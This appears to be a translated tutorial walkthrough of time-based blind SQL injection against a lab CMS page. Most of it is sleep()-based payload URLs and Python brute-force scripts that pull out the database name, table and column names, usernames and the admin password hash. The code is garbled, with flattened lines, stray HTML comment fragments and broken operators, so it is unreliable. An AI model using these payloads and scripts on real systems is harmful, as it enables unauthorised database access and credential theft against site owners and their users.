Delayed injection
Due to network problems and other reasons, if the timeout is too short, the blasting may be inaccurate, but if the timeout is set too long, the blasting time cost will increase.
Principle
Through the condition in if, if it is true, it will sleep, otherwise it will not sleep
Here, the first character is tested bitwise. If the first character of the current database matches, it will be loaded for five seconds.
http://10.9.47.148/cms/show.php?id=33 and if(substr(database(),1,1)='c',sleep(5),1)
Judgment conditions in the script: delay
To save blasting time, change the delay to 1
The blasting time of this method is longer than that of delayed injection.
Database blasting
import string import requests strings = string.digits + string.ascii_letters + '_' str = [] for i in strings: str.append(i) database_name="" # Traverse positions 0-3 for i in range(0,4): # Traverse alphanumeric underscores per bit for j in str: url=f"http://10.9.47.148/cms/show.php?id=33 and if(substr(database(),{<!-- -->i},1)='{<!-- -->j}',sleep(1),1)" #Catch the exception. If the timeout occurs, the character matches and the character is spliced after password_name. try: res = requests.get(url=url,timeout=1) except requests.exceptions.ReadTimeout: database_name + =j break print(database_name)
Table name blast
Judge each character of each table in turn. If it is asleep, the characters match.
http://10.9.47.148/cms/show.php?id=33 and if(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1)=' c',sleep(5),1)
Script source code
import string import requests # Define table name character set (alphanumeric underline) strings = string.digits + string.ascii_letters + '_' str = [] for i in strings: str.append(i) # Run the 0-20th table for i in range(0,20): # After running a table, reset the table name table_name = "" # Assume that the table name of each table can be up to 10 digits, and each table name is queried in bits. for j in range(1,10): for name_str in str: url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select table_name from information_schema.tables where table_schema = database() limit {<!-- -->i} ,1),{<!-- -->j},1)='{<!-- -->name_str}',sleep(1),1)" #Catch the exception. If the timeout occurs, the character matches and the character is spliced after password_name. try: res = requests.get(url=url, timeout=1) except requests.exceptions.ReadTimeout: table_name + = name_str break print(table_name)
Explode the cms_users table
Exploding fields
http://10.9.47.148/cms/show.php?id=33 and if(substr((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit 0,1), 1,1)='u',sleep(5),1)
Delay if characters match
Due to network problems and other reasons, if the timeout time is too short, the blasting may be inaccurate, but if the timeout time is set too long, the blasting time cost will increase. To improve accuracy, the blasting time will be slightly longer. If no error is reported, wait patiently.
import string import requests # Define table name character set (alphanumeric underline) strings = string.digits + string.ascii_letters + '_' str = [] for i in strings: str.append(i) #Run the 0-10 fields (assuming up to 10 fields) for i in range(0,10): # After running a field, reset the field name column_name = "" # Assume that the field name of each table is up to 10 characters, and each field name is queried in bits. for j in range(1,10): for name_str in str: url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit {<!- - -->i},1),{<!-- -->j},1)='{<!-- -->name_str}',sleep(3),1)" #Catch the exception. If the timeout occurs, the character matches and the character is spliced after password_name. try: res = requests.get(url=url, timeout=3) except requests.exceptions.ReadTimeout: column_name + = name_str break print(column_name)
Broken username
http://10.9.47.148/cms/show.php?id=33 and if(substr((select username from cms_users limit 0,1),1,1)='a',sleep(5), 1)
Script source code
import string import requests # Define table name character set (alphanumeric underline) strings = string.digits + string.ascii_letters + '_' str = [] for i in strings: str.append(i) #Run the 0-10 fields (assuming up to 10 fields) for i in range(0,10): # After running a field, reset the field name column_name = "" # Assume that the field name of each table is up to 10 characters, and each field name is queried in bits. for j in range(1,10): for name_str in str: url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select username from cms_users limit {<!-- -->i},1),{<!- - -->j},1)='{<!-- -->name_str}',sleep(5),1)" #Catch the exception. If the timeout occurs, the character matches and the character is spliced after password_name. try: res = requests.get(url=url, timeout=1) except requests.exceptions.ReadTimeout: column_name + = name_str break print(column_name)
Breaking admin password
Source code
import string import requests # Define table name character set (alphanumeric underline) strings = string.digits + string.ascii_letters + '_' str = [] for i in strings: str.append(i) password = "" # md 5 32 bits after encryption, 32 bits after blasting for j in range(1,33): for name_str in str: url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select password from cms_users where username = 'admin' limit 0,1),{<!-- -- >j},1)='{<!-- -->name_str}',sleep(1),1)" res = requests.get(url=url) #Catch the exception. If the timeout occurs, the character matches and the character is spliced after password_name. try: res = requests.get(url=url, timeout=1) except requests.exceptions.ReadTimeout: password + = name_str break print(password)
Decrypt